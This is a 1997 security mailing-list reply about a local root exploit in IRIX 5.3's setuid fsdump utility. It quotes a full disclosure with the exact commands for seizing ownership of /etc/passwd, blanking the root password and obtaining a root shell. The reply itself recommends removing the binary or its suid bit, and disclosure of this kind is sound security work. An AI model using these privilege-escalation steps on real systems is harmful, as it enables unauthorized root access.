[47] in Best-of-Security


BoS: Re: IRIX 5.3 /var/rfindd/fsdump - exploit

daemon@ATHENA.MIT.EDU (Yuri Volobuev)
Wed Feb 26 05:16:22 1997

Date: 	Tue, 25 Feb 1997 11:03:24 -0600
Reply-To: Yuri Volobuev <volobuev@t1.chem.umn.edu>
From: Yuri Volobuev <volobuev@t1.chem.umn.edu>
In-Reply-To:  <199702251433.GAA22777@viewgraphics.com>
Errors-To: best-of-security-request@suburbia.net
To: best-of-security@suburbia.net
Resent-From: best-of-security@suburbia.net

It was on bugtraq last Nov or Dec, I believe.  fsdump is full of holes.
An exploit very similar to this one was posted, plus another less cute one
which nukes passwd using a .lock file before recreating/chowning it.  It's
also present on 6.2.  A good solution would be to remove the fsdump subsystem
entirely; it's about as useless (and unused) as any piece of software could
be.  Removing the suid bit works as well (it'll render fsdump useless anyway).

Maybe the idea of an Irix security FAQ is not all that bad, after all.
Searching bugtraq archives isn't something people do routinely.  I can
probably put something like this together, and I sure could use the help of
contributors and beta-readers.

cheers,

yuri

On Tue, 25 Feb 1997, Chris Sheldon wrote:

> Ok. Well, yet another IRIX 5.3 root exploit.
> Of course, the major problem here is that IRIX allows users to
> give away ownership of files. Without that, this could only
> be used for changing the permissions on a file so that you could read
> and modify it..
>
> The system (an Indy):
> IRIX irix 5.3 11091812 IP22 mips
>
> irix% ls -la /var/rfindd/fsdump
> ---s--x--x    1 root     sys        62032 Jul 25  1995 /var/rfindd/fsdump
>
> What tipped me off that it was exploitable was the fact that it
> was a protected suid binary (---s--x--x). I thought: if someone at
> SGI is being careful not to let non-root users read the binary,
> then it *must* be packed with holes... :-)
>
> So, I'm just a normal user today...
>
> irix% id
> uid=1799(csh) gid=500(users)
>
> irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
> (count to three, and hit ctrl-c)
>
> irix% ls -la /etc/passwd
> -rw-r--r--    1 csh      users        956 Feb 25 06:23 /etc/passwd
>
> And now I've got root access...
>
> irix% tail -8 /etc/passwd
> nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
> noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
> nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null
>
> Tue Feb 25 06:23:48 PST 1997
> Number of inodes total 208740; allocated 31259
> Collecting garbage.
> interrupted
>
> All you have to do is edit off the garbage from the passwd file,
> delete the encrypted root password and reset the perms on the passwd file.
>
> irix% vi /etc/passwd            # remove the encrypted root password
> irix% chgrp sys /etc/passwd
> irix% chown root /etc/passwd
> irix% su -
> irix#
>
>
> That's it.
> (Heck, you don't even have to remove the garbage from the passwd file.)
>
> This can be used to access pretty much any file on the system
> which is currently group owned...
>
> fun, fun, fun until SGI takes the bugs away... ;-) (right)
>